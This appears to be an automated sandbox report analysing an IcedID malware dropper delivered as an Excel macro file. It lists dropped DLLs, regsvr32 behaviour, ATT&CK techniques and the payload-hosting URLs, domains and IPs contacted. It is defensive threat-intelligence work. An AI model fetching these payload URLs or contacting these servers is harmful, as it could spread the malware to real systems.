          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\lsdfik[1].fml
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\lsdfik[1].fml
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\lsdfik[1].fml
          Source: C:\Windows\System32\regsvr32.exe; Process information queried: ProcessInformation

          HIPS / PFW / Operating System Protection Evasion:

          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\System32\regsvr32.exe; Network Connect: 104.21.37.209 80
          Source: C:\Windows\System32\regsvr32.exe; Domain query: astrocycle.download
          Source: C:\Windows\System32\regsvr32.exe; Domain query: aws.amazon.com
          Source: C:\Windows\System32\regsvr32.exe; Network Connect: 13.224.92.73 187
          Source: C:\Windows\System32\regsvr32.exe; Network Connect: 172.67.213.115 80
          Source: C:\Windows\System32\regsvr32.exe; Code function: 3_2_004622DC LookupAccountNameW,3_2_004622DC

          Stealing of Sensitive Information:

          Yara detected IcedID
          Source: Yara match; File source: dump.pcap, type: PCAP
          Source: Yara match; File source: 00000004.00000002.2106938981.00000000002EE000.00000004.00000020.sdmp, type: MEMORY
          Source: Yara match; File source: 00000004.00000002.2106965071.0000000000317000.00000004.00000020.sdmp, type: MEMORY
          Source: Yara match; File source: 00000006.00000002.2114632662.00000000003FD000.00000004.00000020.sdmp, type: MEMORY
          Source: Yara match; File source: 00000003.00000002.2099688550.00000000002ED000.00000004.00000020.sdmp, type: MEMORY
          Source: Yara match; File source: Process Memory Space: regsvr32.exe PID: 2176, type: MEMORY
          Source: Yara match; File source: Process Memory Space: regsvr32.exe PID: 2708, type: MEMORY
          Source: Yara match; File source: Process Memory Space: regsvr32.exe PID: 3048, type: MEMORY

          Remote Access Functionality:

          Yara detected IcedID
          Source: Yara match; File source: dump.pcap, type: PCAP
          Source: Yara match; File source: 00000004.00000002.2106938981.00000000002EE000.00000004.00000020.sdmp, type: MEMORY
          Source: Yara match; File source: 00000004.00000002.2106965071.0000000000317000.00000004.00000020.sdmp, type: MEMORY
          Source: Yara match; File source: 00000006.00000002.2114632662.00000000003FD000.00000004.00000020.sdmp, type: MEMORY
          Source: Yara match; File source: 00000003.00000002.2099688550.00000000002ED000.00000004.00000020.sdmp, type: MEMORY
          Source: Yara match; File source: Process Memory Space: regsvr32.exe PID: 2176, type: MEMORY
          Source: Yara match; File source: Process Memory Space: regsvr32.exe PID: 2708, type: MEMORY
          Source: Yara match; File source: Process Memory Space: regsvr32.exe PID: 3048, type: MEMORY

          Mitre Att&ck Matrix

          Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
          Valid Accounts | Exploitation for Client Execution 43 | Path Interception | Process Injection 11 | Masquerading 121 | OS Credential Dumping | Security Software Discovery 211 | Remote Services | Archive Collected Data 1 | Exfiltration Over Other Network Medium | Encrypted Channel 12 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
          Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Disable or Modify Tools 1 | LSASS Memory | Process Discovery 1 | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Ingress Tool Transfer 14 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
          Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Process Injection 11 | Security Account Manager | Account Discovery 1 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Non-Application Layer Protocol 3 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
          Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Regsvr32 1 | NTDS | System Owner/User Discovery 1 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol 124 | SIM Card Swap | | Carrier Billing Fraud
          Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Software Packing | LSA Secrets | Remote System Discovery 1 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
          Replication Through Removable Media | Launchd | Rc.common | Rc.common | Steganography | Cached Domain Credentials | System Network Configuration Discovery 1 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features
          External Remote Services | Scheduled Task | Startup Items | Startup Items | Compile After Delivery | DCSync | File and Directory Discovery 1 | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact
          Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Indicator Removal from Tools | Proc Filesystem | System Information Discovery 22 | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | | Generate Fraudulent Advertising Revenue

          Behavior Graph

          Behavior Graph ID: 444685; Sample: Purchaseconfirmation-137606.xlsm; Startdate: 06/07/2021; Architecture: WINDOWS; Score: 100
          Sample signatures: Found malware configuration; Document exploit detected (drops PE files); Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros); 6 other signatures
          EXCEL.EXE 53 28 (started)
            DNS/IP: uppercilio.fun 104.21.55.83, 49167, 80 CLOUDFLARENETUS United States
            DNS/IP: voopeople.fun 172.67.194.117, 49166, 80 CLOUDFLARENETUS United States
            DNS/IP: thousandsyears.download 172.67.198.51, 49165, 80 CLOUDFLARENETUS United States
            Dropped: C:\Users\user\XZIBIT.dll, PE32+
            Dropped: C:\Users\user\XTOWN.dll, PE32+
            Dropped: C:\Users\user\XRAY.dll, PE32+
            Dropped: 3 other malicious files
            Signatures: Document exploit detected (creates forbidden files); Document exploit detected (UrlDownloadToFile)
            regsvr32.exe 4 (started)
              DNS/IP: astrocycle.download 172.67.213.115, 49169, 80 CLOUDFLARENETUS United States
              DNS/IP: dr49lng3n1n2s.cloudfront.net 13.224.92.73, 443, 49168, 49170 AMAZON-02US United States
              DNS/IP: 2 other IPs or domains
              Signatures: System process connects to network (likely due to code injection or exploit); Contains functionality to detect hardware virtualization (CPUID execution measurement); Tries to detect virtualization through RDTSC time measurements
            regsvr32.exe (started)
              DNS/IP: 2 other IPs or domains
            regsvr32.exe (started)
              DNS/IP: 104.21.37.209, 49171, 49173, 80 CLOUDFLARENETUS United States
              DNS/IP: tp.8e49140c2-frontier.amazon.com
              DNS/IP: aws.amazon.com

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          No Antivirus matches

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          No Antivirus matches

          Domains

          No Antivirus matches

          URLs

          Source | Detection | Scanner | Label | Link
          http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0 | 0% | URL Reputation | safe |
          http://www.diginotar.nl/cps/pkioverheid0 | 0% | URL Reputation | safe |
          https://www.honeycode.aws/?&amp;trk=el_a134p000003yC6YAAU&amp;trkCampaign=pac-edm-2020-honeycode-hom | 0% | URL Reputation | safe |
          http://ocsp.rootg2.amazontrust.com08 | 0% | URL Reputation | safe |
          http://voopeople.fun/div/44376,8555986111.jpg | 0% | Avira URL Cloud | safe |
          http://crl.sca1b.amazontrust.com/sca1b.crl0 | 0% | URL Reputation | safe |
          http://astrocycle.download/ | 0% | Avira URL Cloud | safe |
          http://servername/isapibackend.dll | 0% | Avira URL Cloud | safe |
          http://ocsp.sca1b.amazontrust.com06 | 0% | URL Reputation | safe |
          http://crl.rootca1.amazontrust.com/rootca1.crl0 | 0% | URL Reputation | safe |
          http://ocsp.rootca1.amazontrust.com0: | 0% | Avira URL Cloud | safe |
          http://windowsmedia.com/redir/services.asp?WMPFriendly=true | 0% | URL Reputation | safe |
          http://crl.rootg2.amazontrust.com/rootg2.crl0 | 0% | URL Reputation | safe |
          http://uppercilio.fun/div/44376,8555986111.jpg | 0% | Avira URL Cloud | safe |
          http://o.ss2.us/0 | 0% | URL Reputation | safe |
          http://thousandsyears.download/div/44376,8555986111.jpg | 0% | Avira URL Cloud | safe |
          http://ocsp.entrust.net03 | 0% | URL Reputation | safe |
          http://crt.rootg2.amazontrust.com/rootg2.cer0= | 0% | URL Reputation | safe |
          http://www.icra.org/vocabulary/. | 0% | URL Reputation | safe |
          http://www.%s.comPA | 0% | URL Reputation | safe |
          http://ocsp.entrust.net0D | 0% | URL Reputation | safe |

          Domains and IPs

          Contacted Domains

          Name | IP | Active | Malicious | Antivirus Detection | Reputation
          uppercilio.fun | 104.21.55.83 | true | false | | unknown
          thousandsyears.download | 172.67.198.51 | true | false | | unknown
          voopeople.fun | 172.67.194.117 | true | false | | unknown
          astrocycle.download | 172.67.213.115 | true | true | | unknown
          dr49lng3n1n2s.cloudfront.net | 13.224.92.73 | true | false | | high
          aws.amazon.com | unknown | unknown | false | | high

          Contacted URLs

          Name | Malicious | Antivirus Detection | Reputation
          http://voopeople.fun/div/44376,8555986111.jpg | false | Avira URL Cloud: safe | unknown
          http://astrocycle.download/ | true | Avira URL Cloud: safe | unknown
          http://uppercilio.fun/div/44376,8555986111.jpg | false | Avira URL Cloud: safe | unknown
          http://thousandsyears.download/div/44376,8555986111.jpg | false | Avira URL Cloud: safe | unknown

          URLs from Memory and Binaries

          Name | Source | Malicious | Antivirus Detection | Reputation
                                                                                            high
                                                                                            https://aws.amazon.com/?nc2=h_lgregsvr32.exe, 00000006.00000003.2111193398.00000000030E9000.00000004.00000001.sdmpfalse
                                                                                              high
                                                                                              http://ocsp.rootca1.amazontrust.com0:regsvr32.exe, 00000003.00000002.2099688550.00000000002ED000.00000004.00000020.sdmp, regsvr32.exe, 00000004.00000002.2106938981.00000000002EE000.00000004.00000020.sdmp, regsvr32.exe, 00000006.00000002.2114632662.00000000003FD000.00000004.00000020.sdmpfalse
                                                                                              • Avira URL Cloud: safe
                                                                                              unknown
                                                                                              https://console.aws.amazon.com/support/home/?nc1=f_drregsvr32.exe, 00000003.00000002.2103080337.0000000003680000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2108123796.0000000002A64000.00000004.00000001.sdmp, regsvr32.exe, 00000006.00000002.2116356167.00000000030C5000.00000004.00000001.sdmpfalse
                                                                                                high
                                                                                                https://aws.amazon.com/fr/regsvr32.exe, 00000003.00000003.2095531751.00000000036B2000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2108123796.0000000002A64000.00000004.00000001.sdmp, regsvr32.exe, 00000006.00000003.2111193398.00000000030E9000.00000004.00000001.sdmpfalse
                                                                                                  high
                                                                                                  http://windowsmedia.com/redir/services.asp?WMPFriendly=trueregsvr32.exe, 00000003.00000002.2102806055.0000000003467000.00000002.00000001.sdmpfalse
                                                                                                  • URL Reputation: safe
                                                                                                  • URL Reputation: safe
                                                                                                  • URL Reputation: safe
                                                                                                  unknown
                                                                                                  https://console.aws.amazon.com/console/home?nc1=f_ct&amp;src=footer-signin-mobileregsvr32.exe, 00000003.00000002.2103080337.0000000003680000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2108123796.0000000002A64000.00000004.00000001.sdmp, regsvr32.exe, 00000006.00000002.2116356167.00000000030C5000.00000004.00000001.sdmpfalse
                                                                                                    high
                                                                                                    https://aws.amazon.com/vi/regsvr32.exe, 00000003.00000003.2095531751.00000000036B2000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2108123796.0000000002A64000.00000004.00000001.sdmp, regsvr32.exe, 00000006.00000003.2111193398.00000000030E9000.00000004.00000001.sdmpfalse
                                                                                                      high
                                                                                                      https://www.twitch.tv/awsregsvr32.exe, 00000003.00000002.2103080337.0000000003680000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2108123796.0000000002A64000.00000004.00000001.sdmp, regsvr32.exe, 00000006.00000002.2116356167.00000000030C5000.00000004.00000001.sdmpfalse
                                                                                                        high
                                                                                                        https://aws.amazon.com/marketplace/?nc2=h_ql_mpregsvr32.exe, 00000003.00000003.2095564891.000000000366F000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2108123796.0000000002A64000.00000004.00000001.sdmp, regsvr32.exe, 00000006.00000003.2111193398.00000000030E9000.00000004.00000001.sdmpfalse
                                                                                                          high
                                                                                                          https://aws.amazon.com/searchregsvr32.exe, 00000003.00000003.2095564891.000000000366F000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2108123796.0000000002A64000.00000004.00000001.sdmp, regsvr32.exe, 00000006.00000003.2111193398.00000000030E9000.00000004.00000001.sdmpfalse
                                                                                                            high
                                                                                                            https://a0.awsstatic.com/libra/1.0.385/libra-head.jsregsvr32.exe, 00000003.00000003.2095564891.000000000366F000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2108123796.0000000002A64000.00000004.00000001.sdmp, regsvr32.exe, 00000006.00000003.2111193398.00000000030E9000.00000004.00000001.sdmpfalse
                                                                                                              high
                                                                                                              http://crl.rootg2.amazontrust.com/rootg2.crl0regsvr32.exe, 00000003.00000002.2099688550.00000000002ED000.00000004.00000020.sdmp, regsvr32.exe, 00000004.00000002.2106965071.0000000000317000.00000004.00000020.sdmp, regsvr32.exe, 00000006.00000002.2114632662.00000000003FD000.00000004.00000020.sdmpfalse
                                                                                                              • URL Reputation: safe
                                                                                                              • URL Reputation: safe
                                                                                                              • URL Reputation: safe
                                                                                                              unknown
                                                                                                              http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.regsvr32.exe, 00000003.00000002.2100967388.0000000002E90000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2108703125.0000000002E30000.00000002.00000001.sdmpfalse
                                                                                                                high
                                                                                                                https://a0.awsstatic.com/da/js/1.0.47/aws-da.jsregsvr32.exe, 00000003.00000002.2103080337.0000000003680000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2108123796.0000000002A64000.00000004.00000001.sdmp, regsvr32.exe, 00000006.00000002.2116356167.00000000030C5000.00000004.00000001.sdmpfalse
                                                                                                                  high
                                                                                                                  https://aws.amazon.com/tw/regsvr32.exe, 00000003.00000003.2095531751.00000000036B2000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2108123796.0000000002A64000.00000004.00000001.sdmp, regsvr32.exe, 00000006.00000003.2111193398.00000000030E9000.00000004.00000001.sdmpfalse
                                                                                                                    high
                                                                                                                    https://aws.amazon.com/tr/?nc1=h_lsregsvr32.exe, 00000004.00000002.2108123796.0000000002A64000.00000004.00000001.sdmp, regsvr32.exe, 00000006.00000003.2111193398.00000000030E9000.00000004.00000001.sdmp, regsvr32.exe, 00000006.00000002.2116356167.00000000030C5000.00000004.00000001.sdmpfalse
                                                                                                                      high
                                                                                                                      https://console.aws.amazon.com/?nc2=h_m_mcregsvr32.exe, 00000003.00000003.2095564891.000000000366F000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2108123796.0000000002A64000.00000004.00000001.sdmp, regsvr32.exe, 00000006.00000003.2111193398.00000000030E9000.00000004.00000001.sdmpfalse
                                                                                                                        high
                                                                                                                        https://aws.amazon.com/fr/?nc1=h_lsregsvr32.exe, 00000004.00000002.2108123796.0000000002A64000.00000004.00000001.sdmp, regsvr32.exe, 00000006.00000003.2111193398.00000000030E9000.00000004.00000001.sdmp, regsvr32.exe, 00000006.00000003.2111365803.000000000309F000.00000004.00000001.sdmp, regsvr32.exe, 00000006.00000002.2116356167.00000000030C5000.00000004.00000001.sdmpfalse
                                                                                                                          high
                                                                                                                          http://o.ss2.us/0regsvr32.exe, 00000003.00000002.2099688550.00000000002ED000.00000004.00000020.sdmp, regsvr32.exe, 00000004.00000002.2106965071.0000000000317000.00000004.00000020.sdmp, regsvr32.exe, 00000006.00000002.2114632662.00000000003FD000.00000004.00000020.sdmpfalse
                                                                                                                          • URL Reputation: safe
                                                                                                                          • URL Reputation: safe
                                                                                                                          • URL Reputation: safe
                                                                                                                          unknown
                                                                                                                          https://aws.amazon.com/search/?searchQuery=regsvr32.exe, 00000003.00000003.2095564891.000000000366F000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2108123796.0000000002A64000.00000004.00000001.sdmp, regsvr32.exe, 00000006.00000003.2111193398.00000000030E9000.00000004.00000001.sdmpfalse
                                                                                                                            high
                                                                                                                            https://a0.awsstatic.com/libra-search/1.0.13/jsregsvr32.exe, 00000003.00000003.2095564891.000000000366F000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2108123796.0000000002A64000.00000004.00000001.sdmp, regsvr32.exe, 00000006.00000003.2111193398.00000000030E9000.00000004.00000001.sdmpfalse
                                                                                                                              high
                                                                                                                              https://amazon.com/uregsvr32.exe, 00000004.00000002.2106965071.0000000000317000.00000004.00000020.sdmpfalse
                                                                                                                                high
                                                                                                                                https://aws.amazon.com/privacy/?nc1=f_prregsvr32.exe, 00000003.00000002.2103080337.0000000003680000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2108123796.0000000002A64000.00000004.00000001.sdmp, regsvr32.exe, 00000006.00000002.2116356167.00000000030C5000.00000004.00000001.sdmpfalse
                                                                                                                                  high
                                                                                                                                  https://aws.amazon.com/pt/?nc1=h_lsregsvr32.exe, 00000004.00000002.2108123796.0000000002A64000.00000004.00000001.sdmp, regsvr32.exe, 00000006.00000003.2111193398.00000000030E9000.00000004.00000001.sdmp, regsvr32.exe, 00000006.00000002.2116356167.00000000030C5000.00000004.00000001.sdmpfalse
                                                                                                                                    high
                                                                                                                                    https://aws.amazon.com/jp/?nc1=h_lsregsvr32.exe, 00000004.00000002.2108123796.0000000002A64000.00000004.00000001.sdmp, regsvr32.exe, 00000006.00000003.2111193398.00000000030E9000.00000004.00000001.sdmp, regsvr32.exe, 00000006.00000002.2116356167.00000000030C5000.00000004.00000001.sdmpfalse
                                                                                                                                      high
                                                                                                                                      http://crl.entrust.net/2048ca.crl0regsvr32.exe, 00000003.00000002.2099688550.00000000002ED000.00000004.00000020.sdmp, regsvr32.exe, 00000004.00000002.2106965071.0000000000317000.00000004.00000020.sdmp, regsvr32.exe, 00000006.00000002.2114632662.00000000003FD000.00000004.00000020.sdmpfalse
                                                                                                                                        high
                                                                                                                                        https://aws.amazon.com/regsvr32.exe, 00000006.00000003.2111193398.00000000030E9000.00000004.00000001.sdmp, regsvr32.exe, 00000006.00000002.2114632662.00000000003FD000.00000004.00000020.sdmpfalse
                                                                                                                                          high
                                                                                                                                          https://amazon.com/(be&)regsvr32.exe, 00000006.00000002.2114632662.00000000003FD000.00000004.00000020.sdmpfalse
                                                                                                                                            high
                                                                                                                                            http://www.msnbc.com/news/ticker.txtregsvr32.exe, 00000003.00000002.2102606658.0000000003280000.00000002.00000001.sdmpfalse
                                                                                                                                              high
                                                                                                                                              https://a0.awsstatic.com/libra-css/images/site/touch-icon-ipad-144-smile.pngregsvr32.exe, 00000006.00000003.2111193398.00000000030E9000.00000004.00000001.sdmpfalse
                                                                                                                                                high
                                                                                                                                                https://a0.awsstatic.com/s_code/js/3.0/awshome_s_code.jsregsvr32.exe, 00000003.00000003.2095564891.000000000366F000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2108123796.0000000002A64000.00000004.00000001.sdmp, regsvr32.exe, 00000006.00000003.2111193398.00000000030E9000.00000004.00000001.sdmpfalse
                                                                                                                                                  high
                                                                                                                                                  https://aws.amazon.com/podcasts/aws-podcast/regsvr32.exe, 00000003.00000002.2103080337.0000000003680000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2108123796.0000000002A64000.00000004.00000001.sdmp, regsvr32.exe, 00000006.00000002.2116356167.00000000030C5000.00000004.00000001.sdmpfalse
                                                                                                                                                    high
                                                                                                                                                    http://ocsp.entrust.net03regsvr32.exe, 00000003.00000002.2099688550.00000000002ED000.00000004.00000020.sdmp, regsvr32.exe, 00000004.00000002.2106965071.0000000000317000.00000004.00000020.sdmp, regsvr32.exe, 00000006.00000002.2114632662.00000000003FD000.00000004.00000020.sdmpfalse
                                                                                                                                                    • URL Reputation: safe
                                                                                                                                                    • URL Reputation: safe
                                                                                                                                                    • URL Reputation: safe
                                                                                                                                                    unknown
                                                                                                                                                    https://aws.amazon.com/jp/regsvr32.exe, 00000003.00000003.2095531751.00000000036B2000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2108123796.0000000002A64000.00000004.00000001.sdmp, regsvr32.exe, 00000006.00000003.2111193398.00000000030E9000.00000004.00000001.sdmpfalse
                                                                                                                                                      high
                                                                                                                                                      http://crt.rootg2.amazontrust.com/rootg2.cer0=regsvr32.exe, 00000003.00000002.2099688550.00000000002ED000.00000004.00000020.sdmp, regsvr32.exe, 00000004.00000002.2106965071.0000000000317000.00000004.00000020.sdmp, regsvr32.exe, 00000006.00000002.2114632662.00000000003FD000.00000004.00000020.sdmpfalse
                                                                                                                                                      • URL Reputation: safe
                                                                                                                                                      • URL Reputation: safe
                                                                                                                                                      • URL Reputation: safe
                                                                                                                                                      unknown
                                                                                                                                                      https://aws.amazon.com/pt/regsvr32.exe, 00000003.00000003.2095531751.00000000036B2000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2108123796.0000000002A64000.00000004.00000001.sdmp, regsvr32.exe, 00000006.00000003.2111193398.00000000030E9000.00000004.00000001.sdmpfalse
                                                                                                                                                        high
                                                                                                                                                        https://aws.amazon.com/?nc1=h_lsregsvr32.exe, 00000004.00000002.2108123796.0000000002A64000.00000004.00000001.sdmp, regsvr32.exe, 00000006.00000003.2111193398.00000000030E9000.00000004.00000001.sdmp, regsvr32.exe, 00000006.00000002.2116356167.00000000030C5000.00000004.00000001.sdmpfalse
                                                                                                                                                          high
                                                                                                                                                          https://s0.awsstatic.com/en_US/nav/v3/panel-content/desktop/index.htmlregsvr32.exe, 00000003.00000003.2095564891.000000000366F000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2108123796.0000000002A64000.00000004.00000001.sdmp, regsvr32.exe, 00000006.00000003.2111193398.00000000030E9000.00000004.00000001.sdmpfalse
                                                                                                                                                            high
                                                                                                                                                            https://a0.awsstatic.com/libra-css/css/1.0.382regsvr32.exe, 00000003.00000003.2095564891.000000000366F000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2108123796.0000000002A64000.00000004.00000001.sdmp, regsvr32.exe, 00000006.00000003.2111193398.00000000030E9000.00000004.00000001.sdmpfalse
                                                                                                                                                              high
                                                                                                                                                              https://aws.amazon.com/es/?nc1=h_lsregsvr32.exe, 00000004.00000002.2108123796.0000000002A64000.00000004.00000001.sdmp, regsvr32.exe, 00000006.00000003.2111193398.00000000030E9000.00000004.00000001.sdmp, regsvr32.exe, 00000006.00000002.2116356167.00000000030C5000.00000004.00000001.sdmpfalse
                                                                                                                                                                high
                                                                                                                                                                http://www.icra.org/vocabulary/.regsvr32.exe, 00000003.00000002.2102806055.0000000003467000.00000002.00000001.sdmpfalse
                                                                                                                                                                • URL Reputation: safe
                                                                                                                                                                • URL Reputation: safe
                                                                                                                                                                • URL Reputation: safe
                                                                                                                                                                unknown
                                                                                                                                                                https://d1.awsstatic.comregsvr32.exe, 00000003.00000003.2095531751.00000000036B2000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2108123796.0000000002A64000.00000004.00000001.sdmp, regsvr32.exe, 00000006.00000003.2111193398.00000000030E9000.00000004.00000001.sdmpfalse
                                                                                                                                                                  high
                                                                                                                                                                  https://aws.amazon.com/de/regsvr32.exe, 00000003.00000003.2095531751.00000000036B2000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2108123796.0000000002A64000.00000004.00000001.sdmp, regsvr32.exe, 00000006.00000003.2111193398.00000000030E9000.00000004.00000001.sdmpfalse
                                                                                                                                                                    high
                                                                                                                                                                    http://investor.msn.com/regsvr32.exe, 00000003.00000002.2102606658.0000000003280000.00000002.00000001.sdmpfalse
                                                                                                                                                                      high
                                                                                                                                                                      https://phd.aws.amazon.com/?nc2=h_m_scregsvr32.exe, 00000003.00000003.2095564891.000000000366F000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2108123796.0000000002A64000.00000004.00000001.sdmp, regsvr32.exe, 00000006.00000003.2111193398.00000000030E9000.00000004.00000001.sdmpfalse
                                                                                                                                                                        high
                                                                                                                                                                        https://a0.awsstatic.com/libra/1.0.385/libra-cardsuiregsvr32.exe, 00000003.00000003.2095564891.000000000366F000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2108123796.0000000002A64000.00000004.00000001.sdmp, regsvr32.exe, 00000006.00000003.2111193398.00000000030E9000.00000004.00000001.sdmpfalse
                                                                                                                                                                          high

Contacted IPs


Public

IP | Domain | Country | ASN | ASN Name | Malicious
172.67.198.51 | thousandsyears.download | United States | 13335 | CLOUDFLARENETUS | false
13.224.92.73 | dr49lng3n1n2s.cloudfront.net | United States | 16509 | AMAZON-02US | false
104.21.55.83 | uppercilio.fun | United States | 13335 | CLOUDFLARENETUS | false
104.21.37.209 | unknown | United States | 13335 | CLOUDFLARENETUS | true
172.67.213.115 | astrocycle.download | United States | 13335 | CLOUDFLARENETUS | true
172.67.194.117 | voopeople.fun | United States | 13335 | CLOUDFLARENETUS | false

General Information

Joe Sandbox Version: 32.0.0 Black Diamond
Analysis ID: 444685
Start date: 06.07.2021
Start time: 15:11:25
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 7m 32s
Hypervisor based Inspection enabled: false
Report type: full
Sample file name: Purchaseconfirmation-137606.xlsm
Cookbook file name: defaultwindowsofficecookbook.jbs
Analysis system description: Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of analysed new started processes analysed: 7
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.troj.expl.evad.winXLSM@7/8@15/6
EGA Information: Failed
HDC Information:
• Successful, ratio: 71.8% (good quality ratio 54.4%)
• Quality average: 60.1%
• Quality standard deviation: 41%
HCA Information:
• Successful, ratio: 82%
• Number of executed functions: 32
• Number of non-executed functions: 3
Cookbook Comments:
• Adjust boot time
• Enable AMSI
• Found application associated with file extension: .xlsm
• Found Word or Excel or PowerPoint or XPS Viewer
• Attach to Office via COM
• Scroll down
• Close Viewer
Warnings:
• Exclude process from analysis (whitelisted): dllhost.exe, svchost.exe
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

No simulations

Joe Sandbox View / Context

IPs

Match | Associated Sample Name / URL | Detection | Context
172.67.198.51 | DeliveryConf535215.xlsm | malicious | thousandsyears.download/div/44376,8555986111.jpg
172.67.198.51 | PI-210610.xlsm | malicious | thousandsyears.download/div/44376,8555986111.jpg
13.224.92.73 | DeliveryConf535215.xlsm | malicious |
104.21.55.83 | DeliveryConf535215.xlsm | malicious | uppercilio.fun/div/44376,8555986111.jpg
104.21.55.83 | PI-210610.xlsm | malicious | uppercilio.fun/div/44376,8555986111.jpg
104.21.37.209 | DeliveryConf535215.xlsm | malicious | astrocycle.download/
172.67.213.115 | DeliveryConf535215.xlsm | malicious | astrocycle.download/
172.67.213.115 | PI-210610.xlsm | malicious | astrocycle.download/

Domains

Match | Associated Sample Name / URL | Detection | Context
                                                                                                                                                                                      PI-210610.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                      • 172.67.198.51
                                                                                                                                                                                      uppercilio.funDeliveryConf535215.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                      • 104.21.55.83
                                                                                                                                                                                      PI-210610.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                      • 104.21.55.83

                                                                                                                                                                                      ASN


                                                                                                                                                                                      JA3 Fingerprints


                                                                                                                                                                                      Dropped Files

Match: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\lsdfik[1].fml
Associated samples: DeliveryConf535215.xlsm, PI-210610.xlsm

Match: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\lsdfik[1].fml
Associated samples: DeliveryConf535215.xlsm, PI-210610.xlsm

Match: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\lsdfik[1].fml
Associated samples: DeliveryConf535215.xlsm, PI-210610.xlsm

                                                                                                                                                                                                  Created / dropped Files

                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\lsdfik[1].fml
                                                                                                                                                                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (native) x86-64, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):57856
                                                                                                                                                                                                  Entropy (8bit):4.963425128586394
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:wIZpbT9PDZE0ix9i33yS6AII5QiyWaTeQC9m6ny96/eQponqM:wypbTax9IyeIGhaaN9Hny962TnqM
